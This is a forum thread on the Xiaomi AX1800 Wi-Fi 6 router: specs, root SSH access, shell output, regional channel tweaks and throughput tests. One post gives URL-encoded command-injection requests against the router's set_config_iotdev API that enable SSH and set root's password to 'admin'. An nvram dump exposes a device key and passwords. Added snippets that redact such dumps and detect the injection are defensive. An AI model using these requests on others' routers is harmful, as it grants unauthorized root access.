Add support for Xiaomi AX1800 Wifi 6 router

Xiaomi introduced a new cheap Wifi 6 router, the AX1800. It costs about 40-45USD.

Specs

Processor: IPQ6000 4-core A53 1.2GHz CPU
Network acceleration engine: single-core 1.5GHz NPU
ROM: 128MB
Memory: 256MB
2.4GHz WiFi: 2x2 (Maximum support IEEE 802.11ax protocol, theoretical maximum rate up to 574Mbps)
5GHz WiFi: 2x2 (the highest support IEEE 802.11ax protocol, the theoretical maximum rate can reach 1201Mbps)
Antenna: 2 built-in dual-frequency antennas
Protocol standards: IEEE 802.11a / b / g / n / ac / ax, IEEE 802.3 / 3u / 3ab
Certification standard: GB/T 9254-2008; GB 4943.1-2011
2.4GHz Channel: 1,2,3,4,5,6,7,8,9,10,11,12,13
5GHz Channel: 36,40,44,48, 149,153,157,161,165
Modulation:
11b: DSSS: DBPSK (1Mbps), DQPSK (2Mbps), CCK (5.5 / 11Mbps)
11a / g: OFDM: BPSK (6 / 9Mbps), QPSK (12 / 18Mbps), 16QAM (24 / 36Mbps), 64QAM (48 / 54Mbps)
11n: MIMO-OFDM: BPSK, QPSK, 16QAM, 64QAM.
Rate set: MCS0 ~ MCS15
11ac: MIMO-OFDM: BPSK, QPSK, 16QAM, 64QAM, 256QAM.
Rate set: MCS0 ~ MCS9 (support 2 streams)
11ax: MIMO-OFDM: BPSK, QPSK, 16QAM, 64QAM, 256QAM, 1024QAM.
Rate set: MCS0 ~ MCS11 (support 2 streams)

Operating system: Smart WiFi operating system based on OpenWRT deeply customized MiWiFi ROM

SSH Access

A guy, djinox, from one of the Russian forums said that he obtained SSH access to it with the Xiaomi AX3600 SSH Guide.

Is it possible to flash OpenWRT to it? If yes, it's kind of a great deal to get a wifi6 router for this kind of money.
P.S. June 10, Xiaomi started to sell the Redmi router AX5 with the same specs but it's gonna cost a bit less soon.

6 Likes

At the moment, no - you'll have to do the bulk part of the porting work based on the (incomplete) ipq807x target support yourself. While it should be possible to support this device, there's still a lot missing to support any individual device (and a lot of the ipq60xx SOC patches are still in flight on LKML).

zhiping has 807x and 60xx reference boards, but no IPQ6000

Anyone got one of these yet?

Received mine but I'm not able to get SSH access, probably need to downgrade the firmware to a previous version for the exploit to work.

Not sure where to find the download links though.

Gained SSH access on latest firmware following the AX3600 guide.

BusyBox v1.25.1 (2020-06-16 04:11:46 UTC) built-in shell (ash)

 -----------------------------------------------------
       Welcome to XiaoQiang!
 -----------------------------------------------------
  $$$$$$\  $$$$$$$\  $$$$$$$$\      $$\      $$\        $$$$$$\  $$\   $$\
 $$  __$$\ $$  __$$\ $$  _____|     $$ |     $$ |      $$  __$$\ $$ | $$  |
 $$ /  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ /  $$ |$$ |$$  /
 $$$$$$$$ |$$$$$$$  |$$$$$\         $$ |     $$ |      $$ |  $$ |$$$$$  /
 $$  __$$ |$$  __$$< $$  __|        $$ |     $$ |      $$ |  $$ |$$  $$<
 $$ |  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ |  $$ |$$ |\$$\
 $$ |  $$ |$$ |  $$ |$$$$$$$$\       $$$$$$$$$  |       $$$$$$  |$$ | \$$\
 \__|  \__|\__|  \__|\________|      \_________/        \______/ \__|  \__|


root@XiaoQiang:~# cat /proc/cpuinfo
processor       : 0
model name      : ARMv7 Processor rev 4 (v7l)
BogoMIPS        : 48.00
Features        : half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt                                    vfpd32 lpae evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x51
CPU architecture: 7
CPU variant     : 0xa
CPU part        : 0x801
CPU revision    : 4

processor       : 1
model name      : ARMv7 Processor rev 4 (v7l)
BogoMIPS        : 48.00
Features        : half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt                                    vfpd32 lpae evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x51
CPU architecture: 7
CPU variant     : 0xa
CPU part        : 0x801
CPU revision    : 4

processor       : 2
model name      : ARMv7 Processor rev 4 (v7l)
BogoMIPS        : 48.00
Features        : half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt                                    vfpd32 lpae evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x51
CPU architecture: 7
CPU variant     : 0xa
CPU part        : 0x801
CPU revision    : 4

processor       : 3
model name      : ARMv7 Processor rev 4 (v7l)
BogoMIPS        : 48.00
Features        : half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt                                    vfpd32 lpae evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x51
CPU architecture: 7
CPU variant     : 0xa
CPU part        : 0x801
CPU revision    : 4

Hardware        : Generic DT based system
Revision        : 0000
Serial          : 0000000000000000

root@XiaoQiang:~# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 00180000 00020000 "0:SBL1"
mtd1: 00100000 00020000 "0:MIBIB"
mtd2: 00380000 00020000 "0:QSEE"
mtd3: 00080000 00020000 "0:DEVCFG"
mtd4: 00080000 00020000 "0:RPM"
mtd5: 00080000 00020000 "0:CDT"
mtd6: 00080000 00020000 "0:APPSBLENV"
mtd7: 00180000 00020000 "0:APPSBL"
mtd8: 00080000 00020000 "0:ART"
mtd9: 00080000 00020000 "bdata"
mtd10: 00080000 00020000 "crash"
mtd11: 00080000 00020000 "crash_syslog"
mtd12: 02c80000 00020000 "rootfs"
mtd13: 02c80000 00020000 "rootfs_1"
mtd14: 01680000 00020000 "overlay"
mtd15: 00080000 00020000 "cfg_bak"
mtd16: 003a2000 0001f000 "kernel"
mtd17: 01303000 0001f000 "ubi_rootfs"
mtd18: 0118f000 0001f000 "rootfs_data"
mtd19: 012e4000 0001f000 "data"

root@XiaoQiang:~# nvram show
bootcmd=tftp
bootdelay=5
SN=27450/F0PV75116
ethaddr="00:AA:BB:CC:DD:10"
ipaddr=192.168.31.1
serverip=192.168.31.100
stdin=serial
stdout=serial
stderr=serial
uart_en=1
telnet_en=0
wl0_ssid=Xiaomi_DD53_22AC_5G
wl1_ssid=Xiaomi_DD53_22AC
wl0_radio=1
wl1_radio=1
boot_wait=on
no_wifi_dev_times=0
flag_boot_rootfs=1
color=101
flag_boot_type=2
CountryCode=CN
flag_last_success=1
flag_ota_reboot=0
miot_did=353359318
miot_key=sTqLb5A0AKKhQQ1e
nv_wan_type=dhcp
flag_boot_success=1
flag_try_sys1_failed=0
flag_try_sys2_failed=0
Router_unconfigured=0
nv_sys_pwd=15f426f6a8437dc96a9cef93d863e5e9ebba6519
nv_wifi_ssid=Xiaomi_DD53
mode=Router
model=RM1800
nv_wifi_enc=mixed-psk
nv_wifi_pwd=123456
nv_wifi_ssid1=Xiaomi_DD53_5G
nv_wifi_enc1=mixed-psk
nv_wifi_pwd1=123456
restore_defaults=0
ssh_en=1

root@XiaoQiang:~# cat /etc/openwrt_release
DISTRIB_ID='OpenWrt'
DISTRIB_RELEASE='18.06-SNAPSHOT'
DISTRIB_REVISION='unknown'
DISTRIB_TARGET='ipq60xx/MiWiFi'
DISTRIB_ARCH='arm_cortex-a7'
DISTRIB_DESCRIPTION='OpenWrt 18.06-SNAPSHOT unknown'
DISTRIB_TAINTS='no-all busybox'

1 Like
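The `nvram show` output in the post above includes a serial number, a Mi IoT key, a system password hash and Wi-Fi passphrases alongside the `ssh_en`/`telnet_en`/`uart_en` switches. As an added example (not part of the original post), this sketch redacts such values from a dump before it is shared and flags the settings that widen the management surface; the list of sensitive keys is an assumption based on the key names in the dump, and the sample values are constructed placeholders.

```python
import re

# Constructed sample in the format of the `nvram show` output; all values are placeholders.
SAMPLE = """\
SN=00000/X0XX00000
uart_en=1
telnet_en=0
miot_key=EXAMPLEKEY000000
nv_sys_pwd=0000000000000000000000000000000000000000
nv_wifi_enc=mixed-psk
nv_wifi_pwd=123456
ssh_en=1
CountryCode=CN
"""

# Assumed list: keys whose values identify the device or act as credentials.
SECRET_KEYS = re.compile(r"^(SN|ethaddr|miot_did|miot_key|nv_sys_pwd|nv_wifi_pwd\d*)$")
# Switches that enable a management interface when set to 1.
EXPOSURE_KEYS = ("ssh_en", "telnet_en", "uart_en")

def parse(dump):
    """Split KEY=VALUE lines; lines without '=' are ignored."""
    pairs = []
    for line in dump.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            pairs.append((key.strip(), value.strip().strip('"')))
    return pairs

def redact(dump):
    """Return the dump with sensitive values replaced, safe to paste in a post."""
    return "\n".join(
        f"{k}=<redacted>" if SECRET_KEYS.match(k) else f"{k}={v}"
        for k, v in parse(dump)
    )

def findings(dump):
    """List settings worth reviewing from a hardening point of view."""
    notes = []
    for key, value in parse(dump):
        if key in EXPOSURE_KEYS and value == "1":
            notes.append(f"{key}=1: management interface enabled")
        elif re.match(r"nv_wifi_pwd\d*$", key) and len(value) < 8:
            notes.append(f"{key}: shorter than the 8-character WPA passphrase minimum")
        elif re.match(r"nv_wifi_enc\d*$", key) and value == "mixed-psk":
            notes.append(f"{key}: WPA/WPA2 mixed mode permits legacy WPA clients")
    return notes

if __name__ == "__main__":
    print(redact(SAMPLE))
    print("\n".join(findings(SAMPLE)))
```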

Unlock EU 5GHz channels/frequencies in config dropdown:

root@XiaoQiang:~# nvram get CountryCode
CN

nvram set CountryCode=EU
nvram commit
nvram get CountryCode
EU

5 Likes

Thanks for the tip! It works, but the MIWifi app has stopped working properly. I had to go back to CN.

2 Likes

I'm not using the app, did the setup directly in the webUI.

Does the app have extra config options??

2 Likes

This thread seems quite stale compared to AX3600. Is there any work being done to run OpenWRT on AX1800? Maybe there are some experimental branches out there?

2 Likes

I think so ! :wink:

1 Like

If so - would be great to get some links.

I am enjoying the device so far - but knowing what possibilities OpenWRT would bring - really makes me restless.

1 Like

Hi,

I unlocked port 22 as written.
The AX1800 answers an SSH request, asking for the password.
But I can't type in the password.

Any idea ?

Perhaps to use SSH on the AX1800 I need Version 1.0.17 for configuration?
Does anybody know where to find it?

Thanks in advance.

Try this

1 Like

Hi, if you have used the full script the default password is "admin" for "root" user.

Hi guys, I received my first AX1800 last week with 1.0.336 firmware from the factory. I can get SSH without problems, and so can a friend with the same router updated to 1.0.378, using the AX3600 SSH script. It's not permanent access, but I only lose it if I reset to factory defaults.

Once you have SSH access you can use WinSCP with protocol SCP and port 22 to access to the full files structure of the router.

I'm going to share here all the tests and commands I used to optimize my router until the other units arrive to create a mesh with them.

SSH access:

Log in to your router and copy the stok code, then use it to replace "Stok" in the path of the commands above.

Change the router IP too.

http://"IP"/cgi-bin/luci/;stok="STOK"/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

http://"IP"/cgi-bin/luci/;stok="STOK"/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B

http://"IP"/cgi-bin/luci/;stok="STOK"/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B

http://"IP"/cgi-bin/luci/;stok="STOK"/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

Then you can access via SSH with PuTTY on port 22, user "root" and password "admin".

By default the Country Code and WIFI Code are CN (China) for both wifi bands. For 2,4Ghz there is no problem using this configuration, because all channels (1-13) are available and TX power output reaches 28dbm (630mW), but 5Ghz channels are limited to 36-40-44-48 and 149-153-157-161 with 80Mhz frequency with 26dbm (398mW) TX power.

Commands:
"nvram get CountryCode"
"uci get wireless.wifi0.country" (5Ghz)
"uci get wireless.wifi1.country" (2.4Ghz)

If you want to get more channels you need to know what your preferences are and the limitations of your country, because the router is limited to 4 Country Codes but has a lot of WIFI Codes available. If you change the Country Code you need to reboot your router to clean the 5Ghz channels list in the web interface.

Available Country Codes are EU, HK, TW, KR and CN, and depending on which one you select, more or fewer channels will be available to select. But not all Country Codes work fine with all WIFI Codes: if, for example, you only change the Country Code to EU, to enable all channels from 36 to 144, and keep CN as the WIFI Code, only channels from 36 to 64 will work, even though channels 100 and up appear as selectable.

Commands:
"iwinfo wl0 freqlist" (5Ghz)
"iwinfo wifi0 txpowerlist"
"iwinfo wl0 txpowerlist"

"iwinfo wl1 freqlist" (2.4Ghz)
"iwinfo wifi1 txpowerlist"
"iwinfo wl1 txpowerlist"

Now, by default the Country registry is set to Global country 00: DFS-UNSET. It performs the frequency ranges and what parameters need to be applied in every range by the Country limitations. You can find all the information for all countries on Google.

Command
iw reg get

global
country 00: DFS-UNSET
1-11 (2402 - 2472 @ 40), (N/A, 20), (N/A)
12-13(2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
14 (2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM, PASSIVE-SCAN
36-48(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
52-64(5250 - 5330 @ 80), (N/A, 20), (0 ms), DFS, AUTO-BW, PASSIVE-SCAN
100-144(5490 - 5730 @ 160), (N/A, 20), (0 ms), DFS, PASSIVE-SCAN
149-165(5735 - 5835 @ 80), (N/A, 20), (N/A), PASSIVE-SCAN
(57240 - 63720 @ 2160), (N/A, 0), (N/A)

2 Likes
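The four `set_config_iotdev` requests in the post above all carry `;`-separated shell commands in the `ssid` parameter. As an added example (not part of the original post), this sketch scans request lines for that pattern from the monitoring side: it decodes `ssid` and flags values that cannot be a plain network name. The log line format, the `PLACEHOLDER` token and the `/api/example/status` path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint named in the requests in the post.
ENDPOINT = "/api/misystem/set_config_iotdev"
# Characters with special meaning to a POSIX shell. A few can occur in real
# SSIDs, so treat a hit as a lead to review rather than proof.
SHELL_META = re.compile(r"[;|&`$<>\n\\]")
MAX_SSID_BYTES = 32  # 802.11 SSID length limit

# Constructed request lines (hypothetical format: client, method, URL).
SAMPLE_LOG = [
    "192.168.31.50 GET /cgi-bin/luci/;stok=PLACEHOLDER/api/misystem/set_config_iotdev"
    "?bssid=Xiaomi&user_id=longdike&ssid=HomeNet",
    "192.168.31.77 GET /cgi-bin/luci/;stok=PLACEHOLDER/api/misystem/set_config_iotdev"
    "?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B",
    "192.168.31.50 GET /cgi-bin/luci/;stok=PLACEHOLDER/api/example/status",
]

def check_ssid(ssid):
    """Return the reasons a decoded ssid value looks like an injected command."""
    reasons = []
    if SHELL_META.search(ssid):
        reasons.append("shell metacharacter")
    if len(ssid.encode("utf-8")) > MAX_SSID_BYTES:
        reasons.append("longer than 32 bytes")
    if ssid.startswith("-"):
        reasons.append("leading '-' (option-like)")
    return reasons

def scan(lines):
    """Return (client, decoded ssid, reasons) for each suspicious request."""
    alerts = []
    for line in lines:
        client, _method, url = line.split(" ", 2)
        parts = urlsplit(url)
        if not parts.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes the value, so %3B becomes ';' before checking.
        for ssid in parse_qs(parts.query, keep_blank_values=True).get("ssid", []):
            reasons = check_ssid(ssid)
            if reasons:
                alerts.append((client, ssid, reasons))
    return alerts

if __name__ == "__main__":
    for client, ssid, reasons in scan(SAMPLE_LOG):
        print(f"{client}: ssid={ssid!r} -> {', '.join(reasons)}")
```

The same `check_ssid` rules can serve as server-side input validation for any handler that passes an SSID to a shell command.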

@Makunan

Thank you so much, have SSH access now with Version 1.0.378.

If someone can adapt OpenWRT for this device, I will donate to him :wink:

Hi all, good news: without changing the Country Code or WIFI Code we can use channels from 52 to 64, with max TX power, HT80 and working in a mesh environment (you need to apply this change to all nodes).

Open a WinSCP connection, go to etc/config/ and edit the wireless file. At the beginning of the text look for "wifi0" "option channel ´X´" and change it to 52, 56, 60 or 64.

Regards!!

As a test I manually updated the wireless drivers from kvalo's github branch and they seem to work fine. I only use the AX1800 as an AP so I haven't tested much.

https://github.com/kvalo/ath11k-firmware/tree/master/IPQ6018/hw1.0/testing/2.5.0.1.r1/WLAN.HK.2.5.0.1.r1-00004-QCAHKSWPL_SILICONZ-1

Did a quick iperf session with an Intel AX200 adapter:

Connecting to host 192.168.1.15, port 5201
[  5] local 192.168.1.185 port 63072 connected to 192.168.1.15 port 5201
[ ID] Interval           Transfer     Bitrate
[  5]   0.00-1.00   sec  94.2 MBytes   790 Mbits/sec
[  5]   1.00-2.00   sec  99.4 MBytes   831 Mbits/sec
[  5]   2.00-3.00   sec   104 MBytes   871 Mbits/sec
[  5]   3.00-4.00   sec  99.5 MBytes   837 Mbits/sec
[  5]   4.00-5.00   sec   101 MBytes   845 Mbits/sec
[  5]   5.00-6.00   sec   103 MBytes   865 Mbits/sec
[  5]   6.00-7.00   sec  97.1 MBytes   817 Mbits/sec
[  5]   7.00-8.01   sec   105 MBytes   874 Mbits/sec
[  5]   8.01-9.00   sec   104 MBytes   879 Mbits/sec
[  5]   9.00-10.00  sec   100 MBytes   841 Mbits/sec
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate
[  5]   0.00-10.00  sec  1007 MBytes   845 Mbits/sec                  sender
[  5]   0.00-10.09  sec  1005 MBytes   835 Mbits/sec                  receiver

At what distance did you get these measurements?